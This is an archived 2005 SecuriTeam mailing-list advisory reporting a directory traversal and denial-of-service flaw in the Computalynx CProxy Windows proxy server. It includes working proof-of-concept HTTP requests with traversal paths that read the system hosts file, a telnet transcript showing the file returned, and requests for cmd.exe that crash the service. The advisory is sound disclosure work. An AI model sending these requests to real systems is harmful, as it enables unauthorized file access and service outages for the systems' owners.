[NT] Directory Traversal In CProxy

• Previous message: SecuriTeam: "[NT] Buffer Overflow Vulnerability in BadBlue"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 7 Mar 2005 10:35:33 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Directory Traversal In CProxy
------------------------------------------------------------------------

SUMMARY

 <http://www.computalynx.com/> CProxy is a Windows based (95/98 and NT4
and 2000) software solution that provides a single point of contact
between your network and the Internet.

Because of inadequate input validation, a malicious attacker can perform a
directory traversal attack and thus gain access to arbitrary files located
on the CProxy Server system. Using the same attack vector with especially
crafted HTTP requests, it is possible to crash the CProxy service running
on the remote system.

DETAILS

Vulnerable Systems:
 * Computalynx CProxy 3.3 family for Win32.
 * Computalynx CProxy 3.4.x (3.4.4 inclusive) for Win32.

When performing proxy functions, CProxy Server is vulnerable to a
directory traversal attack. Inadequate input validation and input
filtering allows a remote attacker to gain attack to arbitrary files on
the Windows system upon which the CProxy Server software has been
deployed. This lies within the fact that the CProxy Server fails to filter
out directory traversal attacks and in turn fails to protect arbitrary
files from being requested and opened using the proxy service. An
especially crafted URL allows allows arbitrary files to be recovered from
the system. The retrieval of system files can compromise the entire system
or expose the system to further avenues of attack. A malicious attacker
can perform a request using the following format to gain access to
arbitrary data.

Proof of concept:
GET http://>/<filename> HTTP/1.0<CRLF><CRLF>

An attacker can gain access to a file in the WINNT directory as shown in
the following example, by connecting to CProxy Server's proxy service
(listening on TCP port 8080 by default), and preforming a request.

Proof of concept:
[user@host ~]$ telnet 10.0.0.1 8080
   Trying 10.0.0.1...
   Connected to 10.0.0.1.
   Escape character is '^]'.
   GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0
                                                                           
                                                                           
                                             
   HTTP/1.0 200 OK
   Content-length: 734
   Date: Sat, 19 Feb 2005 21:09:58 GMT
   Date: Sat, 19 Feb 2005 21:09:58 GMT
   # Copyright (c) 1993-1999 Microsoft Corp.
   #
   # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
   #
   # This file contains the mappings of IP addresses to host names. Each
   # entry should be kept on an individual line. The IP address should
   # be placed in the first column followed by the corresponding host
name.
   # The IP address and the host name should be separated by at least one
   # space.
   #
   # Additionally, comments (such as these) may be inserted on individual
   # lines or following the machine name denoted by a '#' symbol.
   #
   # For example:
   #
   # 102.54.94.97 rhino.acme.com # source server
   # 38.25.63.10 x.acme.com # x client host
                             
   127.0.0.1 localhost
   Connection closed by foreign host.

When retrieving an arbitrary ASCII file using the "GET" method, causes the
file to be displayed and immediately afterwards causes the CProxy Server
service to crash with an error message indicating that "memory could not
be read". However, when retrieving this same ASCII file using the "POST"
or "HEAD" methods, will cause the file contents to be displayed and does
not crash the CProxy Server service, allowing an attacker to execute
multiple requests and thus allowing various arbitrary files to be
retrieved from the CProxy Server system.

Proof of concept:
"POST http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0"
"GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0"

When attempting to retrieve an executable file using any of these HTTP
method ("GET", "HEAD", or "POST"), in the aforementioned manner, will
cause the contents of the executable file contents to be displayed and the
CProxy Server service to crash with an error message of "memory could not
be read", rendering the service unavailable, thus resulting in a
Denial-of-Service condition.

Proof of concept:
"GET http://../../../../../winnt/system32/cmd.exe"
"POST http://../../../../../winnt/system32/cmd.exe"

Disclosure Timeline:
19/02/2005 - Computalynx contacted regarding this issue.
02/03/2005 - At present, the vendor has not replied regarding this issue.

ADDITIONAL INFORMATION

The information has been provided by
<mailto:kristof.philipsen@ubizen.com> Kristof Philipsen.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NT] Buffer Overflow Vulnerability in BadBlue"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]